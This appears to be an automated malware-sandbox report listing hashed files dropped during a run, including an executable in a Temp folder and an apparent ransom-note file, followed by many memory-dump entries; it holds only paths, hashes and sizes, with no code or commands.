
Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
85d9065857b9c788cb439d34597f9bb5

SHA1
72ce1aa13736ec2cf1fdf9ca325196ed83d3af75

SHA256
975f967d1c21d679cc5a7c7533dddac1b6187d877a2a77d5ec993d724f8e3f36

SHA512
c305c2b9fb9b2669060a6f95d05593351d193b76996e8cda6071b422a484b80cd81a097b38381e4afc4f5725ec3141f7656977a94a69b5df9bcab299073f6766

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
0cf7530631f13b2cced224b65a1abd6e

SHA1
c3a12b4a19a33c693356d859a4f58f26970dc49b

SHA256
f9f4ff96c81383991651ace0c0f05fe8fdca05db92452044a2c1c032de751580

SHA512
e6269654d9bf15cfc1438e48a683faac0d96704fa2520cfb40eb0d88d717bda5ee7338931f6e24001ab4086d04925b46550c0d0d811c48dbde07f38545933b1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
6ac1cff85aab53fc263416614bf1df35

SHA1
cdf7676033be5cd8146057a5776074fe41ae4cf5

SHA256
23fb8e3b8deb49e152750f1e6b93574e90b2c152aba9a3344fd997c92ed247d6

SHA512
6e215a753b9484f641f974dc479cec218cb116e295f22f9e6697174119d9f2b0cd6a80d5d3a2d5828f33602915a10de234d386eff84f5b23ec4c19d711028408

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
186d718f830229fc2c24efcaf07b7a58

SHA1
f937fd59fabe392bd6c9a63d2bf5645d9d2ba047

SHA256
1ab44380e31532ace4f506387c4239400337840e99b87914ec325e911171f264

SHA512
356d6c255b2b0e51e7c91bf81a380eb24a01abf88cf55432ced6b2830a1d3cae85a215a1e19f0d6471401aefe5182f6670458908ec4ea26e012b83c93e3ae63e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
1201b8e3adbd497f3fb8a23a89b84ba6

SHA1
97608442babc7413a0a94777b4a9cded939135e8

SHA256
cd40786ca975f625666de094358a0f1f4e4b9bcd86291284155ae268c3a59da1

SHA512
44c617f0b02e5fcb4e50dc446406b1c1ddfe23c625d7fde6f71d8796e4a911ebc2c20fb4dc058b20ca48aa175d87b6d833f80d9f591a88b3d3d0dcdbb130e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
0719d59219d9f2fa6abef78288473232

SHA1
43d06fd20fb3766bc5ee5bfe65956367f59c8888

SHA256
9066112902b0ebcf7afe7fdc37064aef23146f573bf0ec5ed614b19dbdbed8be

SHA512
f67f461c5cfdd615a505d8e41420aadf15e9d9543d72c3c0d3329ae7382a40e6d7e18c5b8408e3aa8a32ea1a12ab16ebc625eb81ffd5e04582a05fd076687626

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
a3f47e00225928e9f0956be5a366b150

SHA1
c5559d2d7e2abb919c05b537843d0a3d263f3ef8

SHA256
7abc18c26da197b3996bfbb3043f2c22be73e8712a822227433da361997cef07

SHA512
2d6c517a5c32946981ee0df73fe04efd8b5c06de1e977526bee305b3394b10bbf842ef4025db4dbdda3c3ecb4facb9dd56a07f587a60f9b9ee47d8464eb4987e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
199b489c229de3c229fba15c3f9c6e3e

SHA1
15a1eda7000d619bafa6683b607dfa6fb55dffa1

SHA256
0e031cef902463e3e2785ede34199b14b6409bdf0b484e7b523820936d85f0e6

SHA512
4758dc7ec0985406f9d71109f6051c40cc8627471a4319417cfd3d06aff86d9749cf5ade48e748047089534cbcb43e0bae98b7efeea0e26419a34fccf3da35ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
199b489c229de3c229fba15c3f9c6e3e

SHA1
15a1eda7000d619bafa6683b607dfa6fb55dffa1

SHA256
0e031cef902463e3e2785ede34199b14b6409bdf0b484e7b523820936d85f0e6

SHA512
4758dc7ec0985406f9d71109f6051c40cc8627471a4319417cfd3d06aff86d9749cf5ade48e748047089534cbcb43e0bae98b7efeea0e26419a34fccf3da35ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
199b489c229de3c229fba15c3f9c6e3e

SHA1
15a1eda7000d619bafa6683b607dfa6fb55dffa1

SHA256
0e031cef902463e3e2785ede34199b14b6409bdf0b484e7b523820936d85f0e6

SHA512
4758dc7ec0985406f9d71109f6051c40cc8627471a4319417cfd3d06aff86d9749cf5ade48e748047089534cbcb43e0bae98b7efeea0e26419a34fccf3da35ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
4c08c4dfcf50b2a18b8f07b00987ebd5

SHA1
b6fa56f6442f26811ed850af7eca8d6810bc3423

SHA256
f8360f70f2e4649b2d3b5ffdd433bf420c7dc657c243c0a7e602e05ab93683e9

SHA512
d23053a2e4e6bde9123482fdf65c0429ac12fbc7b12f7098223382f5afb0f744f060d47b165a41104afcca62350d82140ab6717fb865cf0338abfabc84d3eeab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
b15a473848be9768a69138c26e253d50

SHA1
b32e5ca56d3c83a6683bd2af3d867b6b96ccc9f5

SHA256
6790ae7a5d1ae6ba139c3fa5836c7baf42e916a81c3c1d31e76f4a155598fa8c

SHA512
5a7e4bf7bab1b20dc37996c5e876346a775f09610c03cc768c518cc2c37ae5e1206c6ef908071262a4d2ec445899aa37c1ef5b00f55249c595a7421d595fa67d

Download Submit
C:\Users\Admin\AppData\Local\Temp\13xoccyw.exe

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\13xoccyw.exe

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

MD5
d72b14ba84e4cc3fc239cd8b34d74137

SHA1
10ba5b267571c8b5a16c7206ec4aee6d7831be05

SHA256
618193c474b478027a680b1259b8a8644862f7b6caa6b5b744c549e8429266ee

SHA512
0c53e82e28b94f6586df4c2f29c7358d1ac04f40305f7977b28ee3419512a70cbc93b44dbf33e92d508b79f10580dde87fa6c0e1f74bf4f3f50a9f66f0c0e23d

Download Submit
memory/1004-275-0x000002C61DE56000-0x000002C61DE58000-memory.dmp

Filesize
8KB

Download
memory/1004-163-0x0000000000000000-mapping.dmp

Download
memory/1004-193-0x000002C61DE50000-0x000002C61DE52000-memory.dmp

Filesize
8KB

Download
memory/1004-288-0x000002C61DE58000-0x000002C61DE59000-memory.dmp

Filesize
4KB

Download
memory/1004-196-0x000002C61DE53000-0x000002C61DE55000-memory.dmp

Filesize
8KB

Download
memory/1216-190-0x0000019248393000-0x0000019248395000-memory.dmp

Filesize
8KB

Download
memory/1216-181-0x0000019248390000-0x0000019248392000-memory.dmp

Filesize
8KB

Download
memory/1216-157-0x0000000000000000-mapping.dmp

Download
memory/1216-238-0x0000019248396000-0x0000019248398000-memory.dmp

Filesize
8KB

Download
memory/1216-284-0x0000019248398000-0x0000019248399000-memory.dmp

Filesize
4KB

Download
memory/1364-116-0x0000000000000000-mapping.dmp

Download
memory/1364-131-0x0000017709CE3000-0x0000017709CE5000-memory.dmp

Filesize
8KB

Download
memory/1364-123-0x0000017723E20000-0x0000017723E21000-memory.dmp

Filesize
4KB

Download
memory/1364-126-0x0000017723ED0000-0x0000017723ED1000-memory.dmp

Filesize
4KB

Download
memory/1364-150-0x0000017709CE6000-0x0000017709CE8000-memory.dmp

Filesize
8KB

Download
memory/1364-130-0x0000017709CE0000-0x0000017709CE2000-memory.dmp

Filesize
8KB

Download
memory/1488-309-0x00000000016E0000-0x00000000016E2000-memory.dmp

Filesize
8KB

Download
memory/1724-171-0x0000000000000000-mapping.dmp

Download
memory/1724-291-0x0000021A30578000-0x0000021A30579000-memory.dmp

Filesize
4KB

Download
memory/1724-214-0x0000021A30570000-0x0000021A30572000-memory.dmp

Filesize
8KB

Download
memory/1724-219-0x0000021A30573000-0x0000021A30575000-memory.dmp

Filesize
8KB

Download
memory/1724-277-0x0000021A30576000-0x0000021A30578000-memory.dmp

Filesize
8KB

Download
memory/2108-176-0x000001C1F5200000-0x000001C1F5202000-memory.dmp

Filesize
8KB

Download
memory/2108-188-0x000001C1F5203000-0x000001C1F5205000-memory.dmp

Filesize
8KB

Download
memory/2108-274-0x000001C1F5206000-0x000001C1F5208000-memory.dmp

Filesize
8KB

Download
memory/2108-287-0x000001C1F5208000-0x000001C1F5209000-memory.dmp

Filesize
4KB

Download
memory/2108-154-0x0000000000000000-mapping.dmp

Download
memory/2192-278-0x000001F8E8D46000-0x000001F8E8D48000-memory.dmp

Filesize
8KB

Download
memory/2192-177-0x0000000000000000-mapping.dmp

Download
memory/2192-231-0x000001F8E8D43000-0x000001F8E8D45000-memory.dmp

Filesize
8KB

Download
memory/2192-229-0x000001F8E8D40000-0x000001F8E8D42000-memory.dmp

Filesize
8KB

Download
memory/2192-295-0x000001F8E8D48000-0x000001F8E8D49000-memory.dmp

Filesize
4KB

Download
memory/2204-178-0x000002134C9A0000-0x000002134C9A2000-memory.dmp

Filesize
8KB

Download
memory/2204-290-0x000002134C9A8000-0x000002134C9A9000-memory.dmp

Filesize
4KB

Download
memory/2204-182-0x000002134C9A3000-0x000002134C9A5000-memory.dmp

Filesize
8KB

Download
memory/2204-276-0x000002134C9A6000-0x000002134C9A8000-memory.dmp

Filesize
8KB

Download
memory/2204-156-0x0000000000000000-mapping.dmp

Download
memory/2348-221-0x0000000000000000-mapping.dmp

Download
memory/2392-223-0x000001D4A61D0000-0x000001D4A61D2000-memory.dmp

Filesize
8KB

Download
memory/2392-279-0x000001D4A61D6000-0x000001D4A61D8000-memory.dmp

Filesize
8KB

Download
memory/2392-226-0x000001D4A61D3000-0x000001D4A61D5000-memory.dmp

Filesize
8KB

Download
memory/2392-184-0x0000000000000000-mapping.dmp

Download
memory/2392-293-0x000001D4A61D8000-0x000001D4A61D9000-memory.dmp

Filesize
4KB

Download
memory/3656-114-0x0000000000170000-0x0000000000171000-memory.dmp

Filesize
4KB

Download
memory/3656-117-0x000000001AD40000-0x000000001AD42000-memory.dmp

Filesize
8KB

Download
memory/3960-273-0x000001BD26276000-0x000001BD26278000-memory.dmp

Filesize
8KB

Download
memory/3960-174-0x000001BD26270000-0x000001BD26272000-memory.dmp

Filesize
8KB

Download
memory/3960-285-0x000001BD26278000-0x000001BD26279000-memory.dmp

Filesize
4KB

Download
memory/3960-155-0x0000000000000000-mapping.dmp

Download
memory/3960-186-0x000001BD26273000-0x000001BD26275000-memory.dmp

Filesize
8KB

Download
memory/4164-234-0x0000026C67530000-0x0000026C67532000-memory.dmp

Filesize
8KB

Download
memory/4164-189-0x0000000000000000-mapping.dmp

Download
memory/4164-297-0x0000026C67538000-0x0000026C67539000-memory.dmp

Filesize
4KB

Download
memory/4164-236-0x0000026C67533000-0x0000026C67535000-memory.dmp

Filesize
8KB

Download
memory/4164-280-0x0000026C67536000-0x0000026C67538000-memory.dmp

Filesize
8KB

Download
memory/4212-222-0x0000000000000000-mapping.dmp

Download
memory/4224-269-0x0000000000000000-mapping.dmp

Download
memory/4248-224-0x0000000000000000-mapping.dmp

Download
memory/4292-242-0x000001E9BBDC0000-0x000001E9BBDC2000-memory.dmp

Filesize
8KB

Download
memory/4292-281-0x000001E9BBDC6000-0x000001E9BBDC8000-memory.dmp

Filesize
8KB

Download
memory/4292-199-0x0000000000000000-mapping.dmp

Download
memory/4292-245-0x000001E9BBDC3000-0x000001E9BBDC5000-memory.dmp

Filesize
8KB

Download
memory/4292-292-0x000001E9BBDC8000-0x000001E9BBDC9000-memory.dmp

Filesize
4KB

Download
memory/4412-296-0x0000013FCE4F8000-0x0000013FCE4F9000-memory.dmp

Filesize
4KB

Download
memory/4412-204-0x0000000000000000-mapping.dmp

Download
memory/4412-249-0x0000013FCE4F0000-0x0000013FCE4F2000-memory.dmp

Filesize
8KB

Download
memory/4412-251-0x0000013FCE4F3000-0x0000013FCE4F5000-memory.dmp

Filesize
8KB

Download
memory/4412-283-0x0000013FCE4F6000-0x0000013FCE4F8000-memory.dmp

Filesize
8KB

Download
memory/4448-225-0x0000000000000000-mapping.dmp

Download
memory/4512-313-0x00000287F0276000-0x00000287F0278000-memory.dmp

Filesize
8KB

Download
memory/4512-311-0x00000287F0270000-0x00000287F0272000-memory.dmp

Filesize
8KB

Download
memory/4512-312-0x00000287F0273000-0x00000287F0275000-memory.dmp

Filesize
8KB

Download
memory/4528-294-0x000002BA763D8000-0x000002BA763D9000-memory.dmp

Filesize
4KB

Download
memory/4528-216-0x000002BA763D0000-0x000002BA763D2000-memory.dmp

Filesize
8KB

Download
memory/4528-206-0x0000000000000000-mapping.dmp

Download
memory/4528-282-0x000002BA763D6000-0x000002BA763D8000-memory.dmp

Filesize
8KB

Download
memory/4528-218-0x000002BA763D3000-0x000002BA763D5000-memory.dmp

Filesize
8KB

Download
memory/4556-227-0x0000000000000000-mapping.dmp

Download
memory/4620-207-0x0000000000000000-mapping.dmp

Download
memory/4664-208-0x0000000000000000-mapping.dmp

Download
memory/4696-209-0x0000000000000000-mapping.dmp

Download
memory/4732-228-0x0000000000000000-mapping.dmp

Download
memory/4740-210-0x0000000000000000-mapping.dmp

Download
memory/4796-211-0x0000000000000000-mapping.dmp

Download
memory/4860-212-0x0000000000000000-mapping.dmp

Download
memory/4880-270-0x0000000000000000-mapping.dmp

Download
memory/4888-230-0x0000000000000000-mapping.dmp

Download
memory/4904-213-0x0000000000000000-mapping.dmp

Download
memory/4916-271-0x0000000000000000-mapping.dmp

Download
memory/4956-215-0x0000000000000000-mapping.dmp

Download
memory/5016-217-0x0000000000000000-mapping.dmp

Download
memory/5096-220-0x0000000000000000-mapping.dmp

Download
memory/5132-232-0x0000000000000000-mapping.dmp

Download
memory/5172-233-0x0000000000000000-mapping.dmp

Download
memory/5192-235-0x0000000000000000-mapping.dmp

Download
memory/5240-237-0x0000000000000000-mapping.dmp

Download
memory/5288-239-0x0000000000000000-mapping.dmp

Download
memory/5304-240-0x0000000000000000-mapping.dmp

Download
memory/5324-314-0x000000001B9F0000-0x000000001B9F2000-memory.dmp

Filesize
8KB

Download
memory/5348-241-0x0000000000000000-mapping.dmp

Download
memory/5372-243-0x0000000000000000-mapping.dmp

Download
memory/5400-272-0x0000000000000000-mapping.dmp

Download
memory/5404-244-0x0000000000000000-mapping.dmp

Download
memory/5448-246-0x0000000000000000-mapping.dmp

Download
memory/5460-247-0x0000000000000000-mapping.dmp

Download
memory/5488-248-0x0000000000000000-mapping.dmp

Download
memory/5528-250-0x0000000000000000-mapping.dmp

Download
memory/5580-252-0x0000000000000000-mapping.dmp

Download
memory/5636-253-0x0000000000000000-mapping.dmp

Download
memory/5660-254-0x0000000000000000-mapping.dmp

Download
memory/5696-255-0x0000000000000000-mapping.dmp

Download
memory/5708-256-0x0000000000000000-mapping.dmp

Download
memory/5736-257-0x0000000000000000-mapping.dmp

Download
memory/5772-258-0x0000000000000000-mapping.dmp

Download
memory/5808-259-0x0000000000000000-mapping.dmp

Download
memory/5840-260-0x0000000000000000-mapping.dmp

Download
memory/5880-261-0x0000000000000000-mapping.dmp

Download
memory/5932-262-0x0000000000000000-mapping.dmp

Download
memory/5956-263-0x0000000000000000-mapping.dmp

Download
memory/5972-264-0x0000000000000000-mapping.dmp

Download
memory/6000-316-0x0000022BADC50000-0x0000022BADC52000-memory.dmp

Filesize
8KB

Download
memory/6000-317-0x0000022BADC53000-0x0000022BADC55000-memory.dmp

Filesize
8KB

Download
memory/6000-321-0x0000022BADC55000-0x0000022BADC56000-memory.dmp

Filesize
4KB

Download
memory/6008-265-0x0000000000000000-mapping.dmp

Download
memory/6024-266-0x0000000000000000-mapping.dmp

Download
memory/6088-267-0x0000000000000000-mapping.dmp

Download
memory/6116-268-0x0000000000000000-mapping.dmp

Download
memory/6444-315-0x00000141AF750000-0x00000141AF752000-memory.dmp

Filesize
8KB

Download
memory/6444-318-0x00000141AF753000-0x00000141AF755000-memory.dmp

Filesize
8KB

Download
memory/6444-319-0x00007FF7D8320000-0x00007FF7D8321000-memory.dmp

Filesize
4KB

Download